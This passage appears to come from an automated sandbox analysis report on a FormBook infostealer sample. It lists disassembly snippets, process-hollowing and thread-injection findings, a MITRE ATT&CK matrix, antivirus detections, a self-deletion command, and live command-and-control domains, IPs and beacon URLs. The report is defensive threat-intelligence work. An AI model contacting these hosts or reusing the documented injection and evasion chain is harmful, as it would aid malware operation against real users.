          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05448E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05458EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013A46 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.assisttm.com
          Source: C:\Windows\explorer.exeDomain query: www.gsjbd1.club
          Source: C:\Windows\explorer.exeNetwork Connect: 23.110.214.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.8.125.8 80
          Source: C:\Windows\explorer.exeDomain query: www.tyjgfuke.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.yr-golf.com
          Source: C:\Windows\explorer.exeDomain query: www.fastbest.host
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1300000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeMemory written: C:\Users\user\Desktop\Y1p8VPvyU2.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.321987906.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.308514622.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.339334815.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.310601041.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Program Manager (Not Responding)
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.322319858.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.308814419.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.339785753.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 00000006.00000002.567578197.0000000003CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.332640768.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314336905.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10010AED cpuid
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2Input Capture1Security Software Discovery251Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532909 Sample: Y1p8VPvyU2 Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 34 www.caixadepandora.club 2->34 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 3 other signatures 2->50 11 Y1p8VPvyU2.exe 17 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\msvofdls.dll, PE32 11->30 dropped 32 C:\Users\user\AppData\Local\...\6jgsfkran1lw1, DOS 11->32 dropped 62 Tries to detect virtualization through RDTSC time measurements 11->62 64 Injects a PE file into a foreign processes 11->64 15 Y1p8VPvyU2.exe 11->15         started        signatures6 process7 signatures8 66 Modifies the context of a thread in another process (thread injection) 15->66 68 Maps a DLL or memory area into another process 15->68 70 Sample uses process hollowing technique 15->70 72 Queues an APC in another process (thread injection) 15->72 18 explorer.exe 15->18 injected process9 dnsIp10 36 www.fastbest.host 45.8.125.8, 49810, 80 SELECTELRU Russian Federation 18->36 38 www.tyjgfuke.com 23.110.214.34, 80 LEASEWEB-USA-LAX-11US United States 18->38 40 5 other IPs or domains 18->40 52 System process connects to network (likely due to code injection or exploit) 18->52 22 cscript.exe 12 18->22         started        signatures11 process12 dnsIp13 42 www.tyjgfuke.com 22->42 54 Self deletion via cmd delete 22->54 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Y1p8VPvyU2.exe35%VirustotalBrowse
          Y1p8VPvyU2.exe9%MetadefenderBrowse
          Y1p8VPvyU2.exe64%ReversingLabsWin32.Trojan.Swotter

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll50%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.Y1p8VPvyU2.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Y1p8VPvyU2.exe.2420000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          6.2.cscript.exe.592796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.Y1p8VPvyU2.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.Y1p8VPvyU2.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Y1p8VPvyU2.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.Y1p8VPvyU2.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          6.2.cscript.exe.35c8670.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          yr-golf.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom0%Avira URL Cloudsafe
          https://fastbest.host0%Avira URL Cloudsafe
          http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh0%Avira URL Cloudsafe
          www.tgalegail.quest/n6fr/0%Avira URL Cloudsafe
          http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB0%Avira URL Cloudsafe
          http://www.tyjgfuke.com/$t0%Avira URL Cloudsafe
          http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.tyjgfuke.com
          		23.110.214.34
          		truetrue
            		unknown
            assisttm.com
            		34.102.136.180
            		truefalse
              		unknown
              yr-golf.com
              		34.102.136.180
              		truefalseunknown
              www.fastbest.host
              		45.8.125.8
              		truetrue
                		unknown
                www.caixadepandora.club
                		137.184.111.224
                		truefalse
                  		unknown
                  www.assisttm.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.gsjbd1.club
                    		unknown
                    		unknowntrue
                      		unknown
                      www.yr-golf.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
